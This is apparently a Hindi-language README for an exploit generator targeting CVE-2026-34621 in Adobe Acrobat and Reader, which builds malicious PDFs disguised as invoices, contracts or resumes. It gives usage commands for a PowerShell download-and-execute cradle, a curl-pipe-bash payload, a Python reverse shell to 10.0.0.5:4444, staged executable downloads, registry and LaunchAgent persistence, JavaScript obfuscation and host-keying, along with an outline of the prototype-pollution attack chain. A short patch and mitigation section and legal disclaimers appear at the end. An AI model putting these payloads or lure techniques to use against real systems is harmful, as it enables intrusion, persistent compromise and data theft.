
CVE-2026-34621 के लिए एक परिष्कृत, क्रॉस-प्लेटफ़ॉर्म एक्सप्लॉइट जनरेटर – Adobe Acrobat और Reader में एक गंभीर प्रोटोटाइप प्रदूषण भेद्यता, जो Windows और macOS पर सैंडबॉक्स एस्केप और मनमाना कोड निष्पादन की ओर ले जाती है।
CVE-2026-34621 के लिए एक परिष्कृत, क्रॉस-प्लेटफ़ॉर्म एक्सप्लॉइट जनरेटर – Adobe Acrobat और Reader में एक गंभीर प्रोटोटाइप प्रदूषण भेद्यता जो Windows और macOS पर सैंडबॉक्स एस्केप और मनमाना कोड निष्पादन की ओर ले जाती है।
⚠️ महत्वपूर्ण अस्वीकरण
यह टूल केवल अधिकृत सुरक्षा अनुसंधान और पैठ परीक्षण के लिए है।
उन सिस्टमों के विरुद्ध अनधिकृत उपयोग जिनके आप स्वामी नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट लिखित अनुमति नहीं है, अवैध है। लेखक दुरुपयोग के लिए कोई दायित्व नहीं मानता है।
CVE-2026-34621 Adobe Acrobat और Reader में एक ज़ीरो-डे भेद्यता है जो हमलावर को अनुमति देती है:
यह जनरेटर एक दुर्भावनापूर्ण PDF फ़ाइल बनाता है जो, Adobe Reader के भेद्य संस्करण में खोले जाने पर, पीड़ित के ऑपरेटिंग सिस्टम के अनुरूप पेलोड को स्वचालित रूप से निष्पादित करता है।
समर्थित लक्ष्य प्लेटफ़ॉर्म:
| श्रेणी | क्षमताएँ |
|---|---|
| क्रॉस‑प्लेटफ़ॉर्म पेलोड | OS का स्वतः पता लगाता है और उपयुक्त Windows या macOS कमांड निष्पादन विधि का चयन करता है। |
| एकाधिक निष्पादन वेक्टर | cmd.exe, PowerShell, WScript.Shell (Windows) / Terminal.app, osascript (macOS)। |
| स्टेज्ड पेलोड | दूरस्थ URL से द्वितीय-चरण पेलोड डाउनलोड और निष्पादित करें। |
| स्थिरता | रजिस्ट्री Run कुंजी (Windows) या LaunchAgent (macOS) स्थापित करें। |
| चोरी तकनीक | JavaScript अस्पष्टता के तीन स्तर, पर्यावरण कुंजीकरण, निष्पादन विलंब, बहुरूपी कोड। |
| ल्यूर PDF एम्बेडिंग | एक्सप्लॉइट को वैध दिखने वाली PDF में विलय करें (PyPDF2 आवश्यक है)। |
| एकाधिक ट्रिगर | OpenAction, पेज-ओपन एक्शन, या दस्तावेज़-स्तरीय JavaScript। |
| व्यापक रिपोर्टिंग | पेलोड कॉन्फ़िगरेशन का विवरण देने वाली HTML, TXT, और JSON रिपोर्ट। |
git clone https://github.com/NULL200OK/CVE-2026-34621-Exploit.git
cd CVE-2026-34621-Exploit
python3 -m venv venv
source venv/bin/activate # Linux/macOS
venv\Scripts\activate # Windows
मुख्य स्क्रिप्ट केवल Python मानक लाइब्रेरी का उपयोग करती है। ल्यूर PDF विलय सुविधा के लिए, PyPDF2 स्थापित करें:
pip install PyPDF2
Windows और macOS दोनों पर कैलकुलेटर खोलने वाली एक बुनियादी PDF उत्पन्न करें:
python3 cve_2026_34621_advanced.py -o test.pdf
यह बनाता है:
test.pdf – दुर्भावनापूर्ण PDF फ़ाइल।
test_report.html – विस्तृत HTML रिपोर्ट।
test_report.txt – सादा पाठ सारांश।
test_config.json – JSON कॉन्फ़िगरेशन निर्यात।
Windows कमांड
1-परिदृश्य कमांड
A-बेसिक calc.exe पॉपअप
python cve_2026_34621_advanced.py -o invoice.pdf --win calc.exe
PowerShell रिवर्स शेल
python cve_2026_34621_advanced.py -o contract.pdf --win "powershell -NoP -Ep Bypass -C \"IEX(New-Object Net.WebClient).DownloadString('http://10.0.0.5/shell.ps1')\""
स्थिरता के साथ स्टेज्ड पेलोड
python cve_2026_34621_advanced.py -o resume.pdf --win calc.exe --stage http://192.168.1.100/payload.exe -p
पर्यावरण‑कुंजीकृत (केवल "SALES-PC" पर चलाएं)
python cve_2026_34621_advanced.py -o targeted.pdf --win calc.exe -k SALES-PC
अस्पष्टता स्तर 2 और 10‑सेकंड विलंब के साथ
python cve_2026_34621_advanced.py -o delayed.pdf --win calc.exe -O 2 -d 10
macOS कमांड
2-परिदृश्य कमांड
कैलकुलेटर खोलें
python cve_2026_34621_advanced.py -o invoice.pdf --mac "open /System/Applications/Calculator.app"
स्क्रिप्ट डाउनलोड और निष्पादित करें
python cve_2026_34621_advanced.py -o update.pdf --mac "curl -s http://10.0.0.5/mac_payload.sh | bash"
Python के माध्यम से रिवर्स शेल
python cve_2026_34621_advanced.py -o shell.pdf --mac "python -c 'import socket,subprocess,os;s=socket.socket();s.connect((\"10.0.0.5\",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([\"/bin/sh\",\"-i\"])'"
LaunchAgent के माध्यम से स्थिरता
python cve_2026_34621_advanced.py -o persist.pdf --mac "open /Applications/Calculator.app" -p
ल्यूर PDF में एम्बेड करना
python cve_2026_34621_advanced.py -o safe_invoice.pdf -l /path/to/real_invoice.pdf --trigger pageopen
3-मोबाइल परीक्षण नोट
स्क्रिप्ट स्वयं PDF उत्पन्न करने के लिए डेस्कटॉप (Windows/macOS/Linux) पर चलती है। उत्पन्न PDF को Android या iOS डिवाइस पर खोला जा सकता है, लेकिन:
Adobe Acrobat Reader के मोबाइल संस्करण CVE-2026-34621 के लिए भेद्य नहीं हैं।
पेलोड सिस्टम कमांड निष्पादित करने के बजाय एक हानिरहित डेमो फ़ॉलबैक (URL खोलना या अलर्ट दिखाना) ट्रिगर करेगा।
विकल्प विवरण
-o, --output FILE आवश्यक। आउटपुट PDF फ़ाइलनाम।
--win CMD निष्पादित करने के लिए Windows कमांड (डिफ़ॉल्ट: calc.exe)।
--mac CMD निष्पादित करने के लिए macOS कमांड (डिफ़ॉल्ट: open /System/Applications/Calculator.app)।
--stage URL द्वितीय-चरण पेलोड डाउनलोड करने के लिए URL।
-p, --persistence स्थिरता तंत्र स्थापित करें (Registry/LanchAgent)।
-O, --obfuscate LEVEL JavaScript अस्पष्टता स्तर (0=कोई नहीं, 1=बुनियादी, 2=मध्यवर्ती, 3=उन्नत)।
-d, --delay SECONDS निष्पादन को निर्दिष्ट सेकंड के लिए विलंबित करें।
-k, --key HOSTNAME पर्यावरण कुंजीकरण – केवल मेल खाने वाले होस्टनाम पर निष्पादित करें।
-l, --lure PDF ल्यूर के रूप में उपयोग करने के लिए वैध PDF का पथ (एक्सप्लॉइट को विलय करता है)।
--trigger TYPE ट्रिगर वेक्टर: openaction, pageopen, या doclevel।
--no-reports HTML/TXT/JSON रिपोर्ट उत्पन्न करना छोड़ें।
--seed N प्रतिलिपि योग्य बहुरूपी पीढ़ी के लिए यादृच्छिक बीज सेट करें।
हमला श्रृंखला
प्रोटोटाइप प्रदूषण:
एम्बेडेड JavaScript दुर्भावनापूर्ण गुण (__trusted, privileged, आदि) इंजेक्ट करने के लिए Object.prototype को संशोधित करता है। यह Adobe के JavaScript इंजन ट्रस्ट सीमा को भ्रमित करता है।
संदर्भ वृद्धि
प्रदूषित प्रोटोटाइप के कारण, इंजन अविश्वसनीय दस्तावेज़ JavaScript को गलत तरीके से विशेषाधिकार प्राप्त संदर्भ में चल रहा मानता है।
विशेषाधिकार प्राप्त API पहुंच
स्क्रिप्ट अब app.launchURL, util.readFileIntoStream, और app.trustedFunction जैसे प्रतिबंधित API को कॉल कर सकती है।
सैंडबॉक्स एस्केप
ये API Adobe सैंडबॉक्स के बाहर फ़ाइल सिस्टम पहुंच और प्रक्रिया निष्पादन की अनुमति देते हैं।
मनमाना कोड निष्पादन
स्क्रिप्ट OS-विशिष्ट विधियों का उपयोग करके हमलावर के कमांड को निष्पादित करती है:
Windows: cmd.exe /c, PowerShell, या WScript.Shell।
macOS: Terminal.app URL हैंडलर या osascript।
अस्पष्टता स्तर
स्तर विवरण
0 कोई अस्पष्टता नहीं – सादा पठनीय JavaScript।
1 स्ट्रिंग शाब्दिक String.fromCharCode में परिवर्तित, चर नाम यादृच्छिक।
2 स्तर 1 + डेड कोड इंजेक्शन और जंक टिप्पणियाँ।
3 पूरी स्क्रिप्ट base64-एन्कोडेड और eval(atob(...)) में लपेटी गई, फिर पुनः अस्पष्ट।
उत्पाद ट्रैक भेद्य संस्करण पैच किया गया संस्करण
Adobe Acrobat DC निरंतर ≤ 26.001.21367 26.001.21411
Adobe Acrobat Reader DC निरंतर ≤ 26.001.21367 26.001.21411
Adobe Acrobat 2024 क्लासिक ≤ 24.001.30356 24.001.30362 (Win) / 24.001.30360 (macOS)
तुरंत अपडेट करें: Adobe से नवीनतम सुरक्षा अपडेट लागू करें।
Adobe Reader में JavaScript अक्षम करें: Edit → Preferences → JavaScript → "Enable Acrobat JavaScript" अनचेक करें (ध्यान दें: यह कुछ PDF कार्यक्षमता को तोड़ता है)।
वैकल्पिक PDF व्यूअर का उपयोग करें: ब्राउज़र या तृतीय-पक्ष व्यूअर का उपयोग करने पर विचार करें जो प्रभावित नहीं हैं।
योगदान का स्वागत है, लेकिन कृपया ध्यान दें:
सभी पुल अनुरोध रक्षात्मक अनुसंधान, पहचान सुधार, या रिपोर्टिंग संवर्द्धन के लिए होने चाहिए।
हम ऐसे योगदान स्वीकार नहीं करते हैं जो वैध परीक्षण के लिए आवश्यक से अधिक टूल की आक्रामक क्षमता बढ़ाते हैं।
योगदान करने के लिए:
रिपॉजिटरी को फोर्क करें।
एक फीचर ब्रांच बनाएं।
परिवर्तनों के स्पष्ट विवरण के साथ पुल अनुरोध सबमिट करें।
यह प्रोजेक्ट केवल शैक्षिक और अधिकृत सुरक्षा परीक्षण उद्देश्यों के लिए प्रदान किया गया है।
इस सॉफ़्टवेयर का उपयोग करके, आप सहमत हैं कि सभी लागू कानूनों और विनियमों का अनुपालन करने के लिए आप जिम्मेदार हैं।
लेखक इस टूल के किसी भी दुरुपयोग या क्षति के लिए सभी दायित्व को अस्वीकार करता है।